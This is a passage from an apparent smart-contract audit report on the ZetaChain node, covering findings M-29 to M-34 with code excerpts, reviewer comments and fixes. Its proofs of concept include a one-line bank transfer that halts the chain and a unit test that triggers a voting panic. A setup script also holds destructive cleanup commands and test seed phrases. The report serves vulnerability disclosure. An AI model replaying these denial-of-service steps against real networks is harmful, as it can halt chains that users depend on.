	return &types.MsgUpdateSystemContractResponse{}, nil

lumtis (ZetaChain) confirmed

[M-29] An already executed InTxTracker can still be added

Submitted by zhaojie, also found by MevSec and berndartmueller

Anyone can add InTxTracker has been carried out, the node/observer will still deal with executive InTxTracker, Tx will not be repeated(The status of the vote has been changed and the vote cannot pass) ,but an attacker can cause network congestion.

Proof of Concept

A new architecture use Permissionless Tx Validation Model, anyone can add an InTxTracker, but the AddToInTxTracker function does not verify that an InTxTracker has already been executed, so a Tx that has already been executed can be added again. Since the executed Txs are normal Tx, they can be verified by proof and can be added by anyone.

The observer through GetInboundTrackersForChain access to all the InTxTracker, then parse the Tx content, then MsgVoteOnObservedInboundTx messages sent to a vote, after voting by creates CCTX, Finally execute OutBoundTx.

After the CCTX is created, the InTxTracker will be removed. If added again at this time, the observer still retrieves the Tx and creates a vote, since VoteOnObservedInboundTx uses msg.Digest as the index for voting, so duplicate messages cannot be voted, and eventually CCTX will not be created and will not be executed.

func (k msgServer) VoteOnObservedInboundTx(....) {
	cctx := k.CreateNewCCTX(ctx, msg, index, tssPub, types.CctxStatus_PendingInbound, observationChain, receiverChain)
	defer func() {
		EmitEventInboundFinalized(ctx, &cctx)
		// #nosec G701 always positive
		cctx.InboundTxParams.InboundTxFinalizedZetaHeight = uint64(ctx.BlockHeight())
@>		k.RemoveInTxTrackerIfExists(ctx, cctx.InboundTxParams.SenderChainId, cctx.InboundTxParams.InboundTxObservedHash)
		k.SetCctxAndNonceToCctxAndInTxHashToCctx(ctx, cctx)

But here’s the problem: failing InTxTracker are not deleted, InTxTracker is deleted after a VoteOnObservedInboundTx vote successfully creates a CCTX, but will not be deleted if a cctx is not created ,they are always available to observers, and they keep on executing and failing, causing congestion when there are a large number of these invalid InTxTracker on the network.

An attacker can add all the executed InTxTracker to the network and attack the network, which can make the network not work.

func (k msgServer) AddToInTxTracker(goCtx context.Context, msg *types.MsgAddToInTxTracker) (*types.MsgAddToInTxTrackerResponse, error) {
	ctx := sdk.UnwrapSDKContext(goCtx)
	chain := k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(msg.ChainId)
	if chain == nil {
		return nil, observertypes.ErrSupportedChains

	adminPolicyAccount := k.zetaObserverKeeper.GetParams(ctx).GetAdminPolicyAccount(observertypes.Policy_Type_group1)
	isAdmin := msg.Creator == adminPolicyAccount
	isObserver := k.zetaObserverKeeper.IsAuthorized(ctx, msg.Creator, chain)

	isProven := false
	//@audit isObserver isAdmin does not verify proof if one is true
	if !(isAdmin || isObserver) && msg.Proof != nil {
		txBytes, err := k.VerifyProof(ctx, msg.Proof, msg.ChainId, msg.BlockHash, msg.TxIndex)
		if err != nil {
			return nil, types.ErrProofVerificationFail.Wrapf(err.Error())

		if common.IsEVMChain(msg.ChainId) {
			err = k.VerifyEVMInTxBody(ctx, msg, txBytes)
			if err != nil {
				return nil, types.ErrTxBodyVerificationFail.Wrapf(err.Error())
		} else {
			return nil, types.ErrTxBodyVerificationFail.Wrapf(fmt.Sprintf("cannot verify inTx body for chain %d", msg.ChainId))
		isProven = true

	// Sender needs to be either the admin policy account or an observer
	if !(isAdmin || isObserver || isProven) {
		return nil, errorsmod.Wrap(observertypes.ErrNotAuthorized, fmt.Sprintf("Creator %s", msg.Creator))

    //@audit need to verify that InTxTracker has been executed

	k.SetInTxTracker(ctx, types.InTxTracker{
		ChainId:  msg.ChainId,
		TxHash:   msg.TxHash,
		CoinType: msg.CoinType,
	return &types.MsgAddToInTxTrackerResponse{}, nil

Tools Used


To verify that the InTxTracker has been executed.

DadeKuma (Lookout) commented:

Possible DoS with invalid transactions.

lumtis (ZetaChain) confirmed

0xean (Judge) decreased severity to Medium commented:

but an attacker can cause network congestion.

This does no qualify as H severity, it might qualify to M severity assuming it could lead to a DOS.

[M-30] The unwhitelist function of ERC20Custody cannot be invoked.

Submitted by p0wd3r

The unwhitelist function of ERC20Custody cannot be invoked,

Proof of Concept

The unwhitelist function of ERC20Custody is supposed to be triggered by SignWhitelistTx, but SignWhitelistTx is not called anywhere else. Additionally, there is no test code in node specifically for unwhitelist.


// SignWhitelistTx
// function whitelist(
// address asset,
// ) external onlyTssAddress
// function unwhitelist(
// address asset,
// ) external onlyTssAddress
func (signer *EVMSigner) SignWhitelistTx(
# pwd node/zetaclient
grep -ri 'SignWhitelistTx' *.go

evm_signer.go:// SignWhitelistTx
evm_signer.go:func (signer *EVMSigner) SignWhitelistTx(
grep -ri 'unwhitelist' *.go

evm_signer.go:// function unwhitelist(

The whitelist function is actually called in SignCommandTx, but there is no call to unwhitelist within SignCommandTx.


func (signer *EVMSigner) SignCommandTx(
	cmd string,
	params string,
	to ethcommon.Address,
	outboundParams *types.OutboundTxParams,
	gasLimit uint64,
	gasPrice *big.Int,
	height uint64,
) (*ethtypes.Transaction, error) {
	if cmd == common.CmdWhitelistERC20 {
		erc20 := ethcommon.HexToAddress(params)
		if erc20 == (ethcommon.Address{}) {
			return nil, fmt.Errorf("SignCommandTx: invalid erc20 address %s", params)
		custodyAbi, err := erc20custody.ERC20CustodyMetaData.GetAbi()
		if err != nil {
			return nil, err
		data, err := custodyAbi.Pack("whitelist", erc20)
		if err != nil {
			return nil, err

Ultimately, unwhitelist cannot be invoked through tss.


    function unwhitelist(IERC20 asset) external onlyTSS {
        whitelisted[asset] = false;
        emit Unwhitelisted(asset);

Tools Used


Add a call to SignWhitelistTx.

lumtis (ZetaChain) confirmed

0xean (Judge) commented:

but the function of the protocol or its availability could be impacted

The impact here doesn’t necessarily mean the M severity is warranted, however I think it does impact the “function of the protocol”.

[M-31] When updating gas, if one chain fails, the others should continue to be updated instead of being skipped.

Submitted by p0wd3r, also found by oakcobalt, dontonka, and berndartmueller

Due to an expected error occurring in one chain, the gas for the other chains cannot be updated.

Proof of Concept

IterateAndUpdateCctxGasPrice is used to periodically update the gas price of cctx. It iterates through all cctx in all chains to update their gas price.


	// iterate all chains' pending cctx
	chains := common.DefaultChainsList()
	for _, chain := range chains {
		res, err := k.CctxAllPending(sdk.UnwrapSDKContext(ctx), &types.QueryAllCctxPendingRequest{
			ChainId: chain.ChainId,
		if err != nil {
			return err

		// iterate through all pending cctx
		for _, pendingCctx := range res.CrossChainTx {
			if pendingCctx != nil {
				_, _, err := k.CheckAndUpdateCctxGasPrice(ctx, *pendingCctx, gasPriceIncreaseFlags)
				if err != nil {
					return err

One possible error that can be returned in CheckAndUpdateCctxGasPrice is insufficient balance in the GasStabilityPool.


	if err := k.fungibleKeeper.WithdrawFromGasStabilityPool(ctx, chainID, additionalFees.BigInt()); err != nil {
		return math.ZeroUint(), math.ZeroUint(), cosmoserrors.Wrap(
			fmt.Sprintf("cannot withdraw %s from gas stability pool", additionalFees.String()),

The GasStabilityPool is only replenished when an outbound transaction is finalized.


	// Fund the gas stability pool with the remaining funds
	if err := k.FundGasStabilityPoolFromRemainingFees(ctx, *cctx.GetCurrentOutTxParam(), msg.OutTxChain); err != nil {
			"VoteOnObservedOutboundTx: CCTX: %s Can't fund the gas stability pool with remaining fees %s", cctx.Index, err.Error(),

Therefore, during the execution of IterateAndUpdateCctxGasPrice, outbound cctx may not have been finalized yet, leading to a possible scenario of insufficient balance in the GasStabilityPool, which is an expected occurrence. However, in the current implementation, if the GasStabilityPool of one chain is insufficient, the function directly returns, and the remaining chains in the loop are not processed. For other chains, the GasStabilityPool might be sufficient, and they should not be neglected.

Tools Used


If CheckAndUpdateCctxGasPrice returns an error, skip the loop for that cctx and continue with the outer loop for the chain.

lumtis (ZetaChain) confirmed

[M-32] ZetaSupplyChecker calculation error

Submitted by p0wd3r, also found by berndartmueller


Due to the incorrect calculation of AbortedTxAmount, the result of ZetaSupplyChecker is erroneous.

Proof of Concept

In ZetaSupplyChecker, to verify if the supply is correct, the following formula is used:

eth locked + aborted amount == zeta supply on node + zeta in transit + external supply + genesis amount

The calculation for the aborted amount is as follows:


func (zs *ZetaSupplyChecker) AbortedTxAmount() (sdkmath.Int, error) {
	cctxList, err := zs.zetaClient.GetCctxByStatus(types.CctxStatus_Aborted)
	if err != nil {
		return sdkmath.ZeroInt(), err
	amount := sdkmath.ZeroUint()
	for _, cctx := range cctxList {
		amount = amount.Add(cctx.GetCurrentOutTxParam().Amount)
	amountInt, ok := sdkmath.NewIntFromString(amount.String())
	if !ok {
		return sdkmath.ZeroInt(), errors.New("error parsing amount")
	return amountInt, nil

The problem arises here by directly taking cctx.GetCurrentOutTxParam().Amount, without determining whether the coinType of this cctx is ZETA.

When a revert cctx is created, outParam.coinType is set to cctx.InboundTxParams.CoinType, which can be gas or ERC20, and not necessarily ZETA.


			// create new OutboundTxParams for the revert
			revertTxParams := &types.OutboundTxParams{
				Receiver:           cctx.InboundTxParams.Sender,
				ReceiverChainId:    cctx.InboundTxParams.SenderChainId,
				Amount:             cctx.InboundTxParams.Amount,
				CoinType:           cctx.InboundTxParams.CoinType,
				OutboundTxGasLimit: gasLimit,
			cctx.OutboundTxParams = append(cctx.OutboundTxParams, revertTxParams)

If the revert cctx fails and turns into aborted, for example, in the following code snippet, then this non-ZETA amount will be recorded in AbortedTxAmount.


				if cctx.InboundTxParams.CoinType == common.CoinType_ERC20 {

					if err := k.RefundAmountOnZetaChain(ctx, cctx, cctx.InboundTxParams.Amount); err != nil {
						// log the error
						k.Logger(ctx).Error("failed to refund amount of aborted cctx on ZetaChain",
							"error", err,
							"sender", cctx.InboundTxParams.Sender,
							"amount", cctx.InboundTxParams.Amount.String(),

				cctx.CctxStatus.ChangeStatus(types.CctxStatus_Aborted, err.Error())

Therefore, the quantity returned by AbortedTxAmount is greater than the actual amount of ZETA.

Tools Used


Ensure coinType is ZETA before recording the amount.

lumtis (ZetaChain) confirmed

[M-33] Distribution module address can be used to halt chain breaking all functionality.

Submitted by jayjonah8

Currently any account can send funds to the distribution module account breaking the crisis invariant and causing a complete consensus failure resulting in no new blocks being produced.

In Cosmos based blockchains there are whats called module accounts. During development extra care has to be taken to ensure that module accounts cannot receive any funds outside of the expected rules of the state machine. If they do this can cause invariants to be broken and result in a halted network. Do to this fact the x/bank module accepts a map of addresses that are considered blocklisted from directly receiving funds through arbitrary transactions.

In the ZetaChain blockchain there are many module accounts that can properly accept funds without breaking the rules of the state machine. The vulnerability is that the distribution module account can accept funds from arbitrary users, but does so in a way that breaks the state machine.

Along with causing a total consensus failure, this bug does not allow for any new blocks to be produced which results in an inability to accept new transactions and brings the chain to a complete halt. With regard to blockchain bugs, this is among some of the worst possible scenarios that can take place in a distribution state machine. Imagine being able to bring Ethereum to a halt by simply sending 1 wei to a certain address.

The likelihood of this being exploited in the future is high since it’s simply a transfer of tokens from one account to another.

Proof of Concept

Cosmos Documentation related to this issue located here


  1. Run make install
  2. Inside the cmd/zetacored folder run the command go build. This will create the blockchains binary zetacored which you will use the interact with the blockchain while the node is running.
  3. Run the command make init. I added the genesis account tommy to get the chain to start properly and the changes I made to init.sh which is run by the make init command are as follows:
#!/usr/bin/env bash

export DAEMON_HOME=$HOME/.zetacored
export DAEMON_NAME=zetacored

### chain init script for development purposes only ###
rm -rf ~/.zetacored
kill -9 $(lsof -ti:26657)
zetacored config keyring-backend $KEYRING --home ~/.zetacored
zetacored config chain-id $CHAINID --home ~/.zetacored
echo "race draft rival universe maid cheese steel logic crowd fork comic easy truth drift tomorrow eye buddy head time cash swing swift midnight borrow" | zetacored keys add zeta --algo=secp256k1 --recover --keyring-backend=$KEYRING
echo "hand inmate canvas head lunar naive increase recycle dog ecology inhale december wide bubble hockey dice worth gravity ketchup feed balance parent secret orchard" | zetacored keys add mario --algo secp256k1 --recover --keyring-backend=$KEYRING
echo "lounge supply patch festival retire duck foster decline theme horror decline poverty behind clever harsh layer primary syrup depart fantasy session fossil dismiss east" | zetacored keys add executer_zeta --recover --keyring-backend=$KEYRING --algo secp256k1
echo "debris dumb among crew celery derive judge spoon road oyster dad panic adult song attack net pole merge mystery pig actual penalty neither peasant"| zetacored keys add executer_mario --algo=secp256k1 --recover --keyring-backend=$KEYRING

zetacored init Zetanode-Localnet --chain-id=$CHAINID

#Set config to use azeta
cat $HOME/.zetacored/config/genesis.json | jq '.app_state["staking"]["params"]["bond_denom"]="azeta"' > $HOME/.zetacored/config/tmp_genesis.json && mv $HOME/.zetacored/config/tmp_genesis.json $HOME/.zetacored/config/genesis.json
cat $HOME/.zetacored/config/genesis.json | jq '.app_state["crisis"]["constant_fee"]["denom"]="azeta"' > $HOME/.zetacored/config/tmp_genesis.json && mv $HOME/.zetacored/config/tmp_genesis.json $HOME/.zetacored/config/genesis.json
cat $HOME/.zetacored/config/genesis.json | jq '.app_state["gov"]["deposit_params"]["min_deposit"][0]["denom"]="azeta"' > $HOME/.zetacored/config/tmp_genesis.json && mv $HOME/.zetacored/config/tmp_genesis.json $HOME/.zetacored/config/genesis.json
cat $HOME/.zetacored/config/genesis.json | jq '.app_state["mint"]["params"]["mint_denom"]="azeta"' > $HOME/.zetacored/config/tmp_genesis.json && mv $HOME/.zetacored/config/tmp_genesis.json $HOME/.zetacored/config/genesis.json
cat $HOME/.zetacored/config/genesis.json | jq '.app_state["evm"]["params"]["evm_denom"]="azeta"' > $HOME/.zetacored/config/tmp_genesis.json && mv $HOME/.zetacored/config/tmp_genesis.json $HOME/.zetacored/config/genesis.json
cat $HOME/.zetacored/config/genesis.json | jq '.consensus_params["block"]["max_gas"]="10000000"' > $HOME/.zetacored/config/tmp_genesis.json && mv $HOME/.zetacored/config/tmp_genesis.json $HOME/.zetacored/config/genesis.json
contents="$(jq '.app_state.gov.voting_params.voting_period = "10s"' $DAEMON_HOME/config/genesis.json)" && \
echo "${contents}" > $DAEMON_HOME/config/genesis.json
sed -i '/\[api\]/,+3 s/enable = false/enable = true/' ~/.zetacored/config/app.toml

zetacored add-observer-list standalone-network/observers.json --keygen-block=5
zetacored keys add tommy --keyring-backend test # added
zetacored add-genesis-account tommy 1000000000000000000000stake,1000000000000000000000azeta # added
zetacored gentx tommy 1000000000000000000000stake --chain-id=$CHAINID --keyring-backend=$KEYRING # added

echo "Collecting genesis txs..."
zetacored collect-gentxs

echo "Validating genesis file..."
zetacored validate-genesis
  1. Run make run. I also made the following changes ( adding the --inv-check-period 2 flag) to the run.sh file which is run when calling the make run command so that all invariants can be checked every two blocks to catch the vulnerability quickly.
    #!/usr/bin/env bash


    killall zetacored
    zetacored start --inv-check-period 2 --trace \
    --minimum-gas-prices=0.0001azeta \
    --json-rpc.api eth,txpool,personal,net,debug,web3,miner \
    --api.enable >> ~/.zetacored/zetacored.log 2>&1  & \
    #>> "$HOME"/.zetacored/zetanode.log 2>&1  & \

    #--home ~/.zetacored \
    #--p2p.laddr  \
    #--grpc.address \
    #--grpc-web.address \
    #--address tcp:// \
    #--rpc.laddr tcp:// \
    #--pruning custom \
    #--pruning-keep-recent 54000 \
    #--pruning-interval 10 \
    #--min-retain-blocks 54000 \
    #--state-sync.snapshot-interval 14400 \
    #--state-sync.snapshot-keep-recent 3

    #echo "--> Submitting proposal to update admin policies "
    #sleep 7
    #zetacored tx gov submit-legacy-proposal param-change standalone-network/proposal.json --from $signer --gas=auto --gas-adjustment=1.5 --gas-prices=0.001azeta --chain-id=$CHAINID --keyring-backend=$KEYRING -y --broadcast-mode=block
    #echo "--> Submitting vote for proposal"
    #sleep 7
    #zetacored tx gov vote 1 yes --from $signer --keyring-backend $KEYRING --chain-id $CHAINID --yes --fees=40azeta --broadcast-mode=block
    tail -f ~/.zetacored/zetacored.log
  1. While the chain is running, in another terminal you can query the blockchain and send transactions using the zetacored binary. First you can see all the module accounts by running the command zetacored q auth accounts. This will contain the vulnerable distribution account as shown below. Make sure the address is correct for the next step. You can also verify the zeta account being used to send funds to the distribution account with the command zetacored keys list.
    '@type': /cosmos.auth.v1beta1.ModuleAccount
    account_number: "6"
    address: zeta1jv65s3grqf6v6jl3dp4t6c9t9rk99cd83m2fn0
    pub_key: null
    sequence: "0"
    name: distribution
    permissions: []
  1. Use the already included zeta account that has an azeta balance to send a transaction that sends funds from the zeta account to the vulnerable distribution account with the following command which will cause the chain to halt with a Consensus Failure error and also cause all blocks to stop being produced breaking the chain completely.

zetacored tx bank send zeta13c7p3xrhd6q2rx3h235jpt8pjdwvacyw6twpax zeta1jv65s3grqf6v6jl3dp4t6c9t9rk99cd83m2fn0 100azeta --gas-prices 20azeta

The way to fix this bug is by adding the distribution module account address to the blocklisted mapping in the bank module. This will prevent arbitrary users from sending funds directly to this address. If this address is indeed suppose to hold funds it should be done in a way that does not break the state machine or cause invariants to break.

Solution described here.

lumtis (ZetaChain) confirmed

0xean (Judge) decreased severity to Medium and commented:

DOS of this nature I think should be M severity, I don’t see the direct loss of funds in this instance.

[M-34] Possible index out of range in GetVoterIndex could cause ballot to never finalize due to panic

Submitted by dontonka, also found by csanuragjain and zhaojie

The function GetVoterIndex is used in multiple places to get the index of a specific Observer from the Voter List. The problem is that the caller is assuming the function will always succeed, but clearly there is a possibility where the Observer address could not be found, which would return an index of -1, which will effectivelly make the program panic.

func (m Ballot) GetVoterIndex(address string) int {
	index := -1
	for i, addr := range m.VoterList {
		if addr == address {
			return i
	return index


This one is safe since the GetVoterIndex is called from the same ballot instance it is iterating over, so it’s impossible to not find the index in such case.

	for i, voterAddress := range ballot.VoterList {
		voter := types.VoterList{
			VoterAddress: voterAddress,
			VoteType:     ballot.Votes[ballot.GetVoterIndex(voterAddress)],
		votersList[i] = &voter



Safe, for the same reason as instance 1.

		for _, address := range m.VoterList {
			vote := m.Votes[m.GetVoterIndex(address)]




Even if this is public function, it’s actually a private one and only used by AddVote, so share the same risk.

func (m Ballot) HasVoted(address string) bool {
	index := m.GetVoterIndex(address)
	return m.Votes[index] != VoteType_NotYetVoted



This is the one that carries some risks. This is called by AddVoteToBallot which is then called in 6 differents places (VoteOnObservedInboundTx, VoteOnObservedOutboundTx, CreateTSSVoter 1, CreateTSSVoter 2, AddBlameVote and AddBlockHeader), with the ballot instance and address being looked at coming in different parameters and from different sources, so here there is posibility the issue could occur.

func (m Ballot) AddVote(address string, vote VoteType) (Ballot, error) {
	if m.HasVoted(address) {
		return m, errors.Wrap(ErrUnableToAddVote, fmt.Sprintf(" Voter : %s | Ballot :%s | Already Voted", address, m.String()))
	// `index` is the index of the `address` in the `VoterList`
	// `index` is used to set the vote in the `Votes` array
	index := m.GetVoterIndex(address)
	m.Votes[index] = vote
	return m, nil



  • zetaclientd would panic (so crash) if the indicated code path is activated in Instance 4.
  • The ballot created and still in progress might never be able to be finalized depending on how many Observer have been updated and what is the threshold. A ballot never finalizing would mean the CCTX never reaching consensus and funds loss, which is why this seems to warrant High severity.

Proof of Concept

Here is a PoC when using AddBlockHeader, but there might be other cracks coming from the 5 other places I identified for Instance 4 where this code path can be activated.

  1. AddBlockHeader gRPC endpoint is called by Observer A. Current Observer list is A,B. Since this is the first vote, the ballot is created by FindBallot with observers list being A,B.
  2. Afterward, UpdateObserver gRPC endpoint is called to update Observer B for reason ObserverUpdateReason_AdminUpdate. This update Observer B address to now be C in the the ObserverMapper and the observer list.
  3. AddBlockHeader is called by Observer C (which was previously B). The ballot created previously is retrieved and AddVoteToBallot is called, which in turns call ballot.AddVote(C,...), which in turns call HasVoted which will panic against return m.Votes[index] != VoteType_NotYetVoted since index will be -1, as C is not in the ballot Observer list.
    	// AddVoteToBallot adds a vote and sets the ballot
    	ballot, err = k.AddVoteToBallot(ctx, ballot, vote.Creator, types.VoteType_SuccessObservation)
    	if err != nil {
    		return nil, err
    func (m Ballot) AddVote(address string, vote VoteType) (Ballot, error) {
    	if m.HasVoted(address) {
    		return m, errors.Wrap(ErrUnableToAddVote, fmt.Sprintf(" Voter : %s | Ballot :%s | Already Voted", address, m.String()))
    func (m Ballot) HasVoted(address string) bool {
    	index := m.GetVoterIndex(address)
    	return m.Votes[index] != VoteType_NotYetVoted

Coded PoC

In order to demostrate my point explained before, I coded it in the following unit test. With the original code it will panic, while by adding my recommendation it will not and recover.

    func TestMsgServer_AddBlockHeader_Mixed_With_UpdateObserver(t *testing.T) {
    	header, _, _, err := sample.EthHeader()
    	assert.NoError(t, err)
    	header1RLP, err := rlp.EncodeToBytes(header)
    	assert.NoError(t, err)

    	observerChain := common.GoerliChain()
    	r := rand.New(rand.NewSource(9))
    	validatorA := sample.Validator(t, r)
    	validatorB := sample.Validator(t, r)
    	validatorC := sample.Validator(t, r)
    	observerAddressA, _ := types.GetAccAddressFromOperatorAddress(validatorA.OperatorAddress)
    	observerAddressB, _ := types.GetAccAddressFromOperatorAddress(validatorB.OperatorAddress)
    	observerAddressC, _ := types.GetAccAddressFromOperatorAddress(validatorC.OperatorAddress)

    	tt := []struct {
    		name                  string
    		msg                   *types.MsgAddBlockHeader
    		msg1                  *types.MsgAddBlockHeader
    		IsEthTypeChainEnabled bool
    		IsBtcTypeChainEnabled bool
    		validatorA            stakingtypes.Validator
    		validatorB            stakingtypes.Validator
    			name: "success submit eth header",
    			msg: &types.MsgAddBlockHeader{
    				Creator:   observerAddressA.String(),
    				ChainId:   common.GoerliChain().ChainId,
    				BlockHash: header.Hash().Bytes(),
    				Height:    1,
    				Header:    common.NewEthereumHeader(header1RLP),
    			msg1: &types.MsgAddBlockHeader{
    				Creator:   observerAddressC.String(),
    				ChainId:   common.GoerliChain().ChainId,
    				BlockHash: header.Hash().Bytes(),
    				Height:    1,
    				Header:    common.NewEthereumHeader(header1RLP),
    			IsEthTypeChainEnabled: true,
    			IsBtcTypeChainEnabled: true,
    			validatorA:            validatorA,
    			validatorB:            validatorB,
    	for _, tc := range tt {
    		t.Run(tc.name, func(t *testing.T) {
    			k, ctx := keepertest.ObserverKeeper(t)
    			srv := keeper.NewMsgServerImpl(*k)
    			k.SetObserverMapper(ctx, &types.ObserverMapper{
    				ObserverChain: &observerChain,
    				ObserverList:  []string{observerAddressA.String(), observerAddressB.String()},
    			k.GetStakingKeeper().SetValidator(ctx, tc.validatorA)
    			k.GetStakingKeeper().SetValidator(ctx, tc.validatorB)

    			k.SetCrosschainFlags(ctx, types.CrosschainFlags{
    				IsInboundEnabled:      true,
    				IsOutboundEnabled:     true,
    				GasPriceIncreaseFlags: nil,
    				BlockHeaderVerificationFlags: &types.BlockHeaderVerificationFlags{
    					IsEthTypeChainEnabled: tc.IsEthTypeChainEnabled,
    					IsBtcTypeChainEnabled: tc.IsBtcTypeChainEnabled,

    			// First vote for BlockHeader with ObserverA which will create the ballot as first voter
    			// Voterlist in the ballot struct: A,B
    			_, err := srv.AddBlockHeader(ctx, tc.msg)

    			// Setup such that UpdateObserver is happy
    			admin := sample.AccAddress()
    			validatorC.Status = stakingtypes.Bonded
    			k.GetStakingKeeper().SetValidator(ctx, validatorC)
    			setAdminCrossChainFlags(ctx, k, admin, types.Policy_Type_group2)

    			k.SetNodeAccount(ctx, types.NodeAccount{
    				Operator: observerAddressB.String(),
    			k.SetLastObserverCount(ctx, &types.LastObserverCount{
    				Count: 2,

    			// Observer: B --> C
    			_, err = srv.UpdateObserver(ctx, &types.MsgUpdateObserver{
    				Creator:            admin,
    				OldObserverAddress: observerAddressB.String(),
    				NewObserverAddress: observerAddressC.String(),
    				UpdateReason:       types.ObserverUpdateReason_AdminUpdate,

    			// Second vote for BlockHeader with ObserverC, that was before ObserverB. This will panic
    			_, err = srv.AddBlockHeader(ctx, tc.msg1)
    			assert.NotNil(t, err)

Call stack

    === RUN   TestMsgServer_AddBlockHeader_Mixed_With_UpdateObserver
    --- FAIL: TestMsgServer_AddBlockHeader_Mixed_With_UpdateObserver (0.56s)
    === RUN   TestMsgServer_AddBlockHeader_Mixed_With_UpdateObserver/success_submit_eth_header
        --- FAIL: TestMsgServer_AddBlockHeader_Mixed_With_UpdateObserver/success_submit_eth_header (0.02s)
    panic: runtime error: index out of range [-1] [recovered]
    	panic: runtime error: index out of range [-1]

    goroutine 98 [running]:
    testing.tRunner.func1.2({0x168aea0, 0xc0006a6c00})
    	/usr/local/go/src/testing/testing.go:1526 +0x24e
    	/usr/local/go/src/testing/testing.go:1529 +0x39f
    panic({0x168aea0, 0xc0006a6c00})
    	/usr/local/go/src/runtime/panic.go:884 +0x213
    github.com/zeta-chain/zetacore/x/observer/types.Ballot.AddVote({{0xc00025d8b0, 0x42}, {0xc00025d900, 0x42}, {0xc0013d36a0, 0x2, 0x2}, {0xc0013022e0, 0x2, 0x2}, ...}, ...)
    	/mnt/c/IX/GitProjects/platform-tools/ETH_course/C4/2023-11-zetachain/repos/node/x/observer/types/ballot.go:11 +0x4b9
    github.com/zeta-chain/zetacore/x/observer/keeper.Keeper.AddVoteToBallot({{0x1bd0ac0, 0xc000c9e410}, {0x1bb7050, 0xc000d51540}, {0x1bb7078, 0xc000d51550}, {{0x1bd0ac0, 0xc000c9e410}, 0xc000014b50, {0x1bb7050, ...}, ...}, ...}, ...)
    	/mnt/c/IX/GitProjects/platform-tools/ETH_course/C4/2023-11-zetachain/repos/node/x/observer/keeper/keeper_utils.go:13 +0x10f
    github.com/zeta-chain/zetacore/x/observer/keeper.msgServer.AddBlockHeader({{{0x1bd0ac0, 0xc000c9e410}, {0x1bb7050, 0xc000d51540}, {0x1bb7078, 0xc000d51550}, {{0x1bd0ac0, 0xc000c9e410}, 0xc000014b50, {0x1bb7050, ...}, ...}, ...}}, ...)
    	/mnt/c/IX/GitProjects/platform-tools/ETH_course/C4/2023-11-zetachain/repos/node/x/observer/keeper/msg_server_add_block_header.go:79 +0x906
    	/mnt/c/IX/GitProjects/platform-tools/ETH_course/C4/2023-11-zetachain/repos/node/x/observer/keeper/msg_server_add_block_header_test.go:267 +0xd48
    testing.tRunner(0xc0010104e0, 0xc00066e000)
    	/usr/local/go/src/testing/testing.go:1576 +0x10b
    created by testing.(*T).Run
    	/usr/local/go/src/testing/testing.go:1629 +0x3ea

    Process finished with the exit code 1

The probability of the indicated negative impacts happening as soon as UpdateObserver is pretty high depending on the blockchain activity (and ballot currently in progress), but calling UpdateObserver should not happen often and can only be triggered by the Admins Group2 (multi-sig).

Granted that the scenario exposed in my PoC might be rare, I haven’t taken the time to investigate all the other coner cases where this code path can be activated, which raise doubts on the frequency such scenario can happen which is another reason why it should be mitigated.

I would recommend todo the following changes in order to fix the panic in HasVoted and AddVote at least which seems to present some risks. That will not resolve the issue that impacted ballot might never been able to finalize. A way to mitigate this would be to update also the ballot when updating the observer address.

diff --git a/repos/node/x/observer/types/ballot.go b/repos/node/x/observer/types/ballot.go
index dae3476..1e44221 100644
--- a/repos/node/x/observer/types/ballot.go
+++ b/repos/node/x/observer/types/ballot.go
@@ -14,13 +14,20 @@ func (m Ballot) AddVote(address string, vote VoteType) (Ballot, error) {
        // `index` is the index of the `address` in the `VoterList`
        // `index` is used to set the vote in the `Votes` array
        index := m.GetVoterIndex(address)
-       m.Votes[index] = vote
-       return m, nil
+       if index != -1 {
+               m.Votes[index] = vote
+               return m, nil
+       }
+       return m, errors.Wrap(ErrUnableToAddVote, fmt.Sprintf(" Voter : %s | Ballot :%s | Not found!", address, m.String()))

 func (m Ballot) HasVoted(address string) bool {
        index := m.GetVoterIndex(address)
-       return m.Votes[index] != VoteType_NotYetVoted
+       if index != -1 {
+               return m.Votes[index] != VoteType_NotYetVoted
+       }
+       return false

0xean (Judge) decreased severity to Medium and commented:

@lumtis - I don’t see proof that this leads to a loss of user funds if CCTXs are paused, can you explain to me how that occurs which is needed for this to be considered as H severity?

lumtis (ZetaChain) confirmed and commented:

Yes, I confirmed this is an issue that need to be fixed but on the severity I agree to decrease to med risk

Low Risk and Non-Critical Issues

For this audit, 20 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by dontonka received the top score from the judge.

The following wardens also submitted reports: IllIllI, MevSec, 0x6980, PNS, ciphermarco, Al-Qa-qa, ChaseTheLight, hihen, oakcobalt, SAQ, QiuhaoLi, codeslide, lsaudit, Bauchibred, Kaysoft, Topmark, cartlex_, p0wd3r, and Sathish9098.

[01] evm_signer::TryProcessOutTx err variable doesn’t need to be declared

evm_signer::TryProcessOutTx err variable doesn’t need to be declared here, as it will be created here and is not used before that. So the following code is also useless. So I suggest to remove those.

	var to ethcommon.Address
-	var err error
	var toChain *common.Chain
	if send.CctxStatus.Status == types.CctxStatus_PendingRevert {
		to = ethcommon.HexToAddress(send.InboundTxParams.Sender)
		toChain = common.GetChainFromChainID(send.InboundTxParams.SenderChainId)
		if toChain == nil {
			logger.Error().Msgf("Unknown chain: %d", send.InboundTxParams.SenderChainId)
		logger.Info().Msgf("Abort: reverting inbound")
	} else if send.CctxStatus.Status == types.CctxStatus_PendingOutbound {
		to = ethcommon.HexToAddress(send.GetCurrentOutTxParam().Receiver)
		toChain = common.GetChainFromChainID(send.GetCurrentOutTxParam().ReceiverChainId)
		if toChain == nil {
			logger.Error().Msgf("Unknown chain: %d", send.GetCurrentOutTxParam().ReceiverChainId)
	} else {
		logger.Info().Msgf("Transaction doesn't need to be processed status: %d", send.CctxStatus.Status)
-	if err != nil {
-		logger.Error().Err(err).Msg("ParseChain fail; skip")
-		return
-	}

	// Early return if the cctx is already processed
	included, confirmed, err := evmClient.IsSendOutTxProcessed(send.Index, send.GetCurrentOutTxParam().OutboundTxTssNonce, send.GetCurrentOutTxParam().CoinType, logger)
	if err != nil {
		logger.Error().Err(err).Msg("IsSendOutTxProcessed failed")


[02] evm_signer::TryProcessOutTx does allow to send out CCTX tx to address(0)

evm_signer::TryProcessOutTx does allow to send out CCTX tx to address(0), which would effectivelly cause a funds loss. This is low as self-reck. I would recommend to add the following conditions.

	if send.CctxStatus.Status == types.CctxStatus_PendingRevert {
		to = ethcommon.HexToAddress(send.InboundTxParams.Sender)
		toChain = common.GetChainFromChainID(send.InboundTxParams.SenderChainId)
		if toChain == nil {
